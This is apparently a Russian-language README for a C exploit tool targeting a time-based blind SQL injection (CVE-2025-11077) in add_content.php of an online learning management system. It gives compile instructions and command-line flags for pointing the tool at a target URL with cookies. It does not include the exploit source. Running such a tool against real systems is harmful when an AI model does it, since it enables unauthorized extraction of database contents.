
Эксплуатация слепой SQL-инъекции в (системе управления онлайн-обучением)
Автор: Byte Reaper
Эта уязвимость представляет собой слепую SQL-инъекцию в файле add_content.php системы управления онлайн-обучением (CVE-2025-11077), позволяющую злоумышленнику извлекать информацию из базы данных с помощью специально сформированных POST-запросов.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
- HELP:
./CVE-2025-11077 -h
- Целевой URL (базовый URL)
./CVE-2025-11077 -u http://[IP]
- Файл журнала:
./CVE-2025-11077 -f [FILE]
- Проверка слепой инъекции по времени:
./CVE-2025-11077 -u http://[IP] -b
- Файл с cookies:
./CVE-2025-11077 -u http://[IP] -c [FILE]
MIT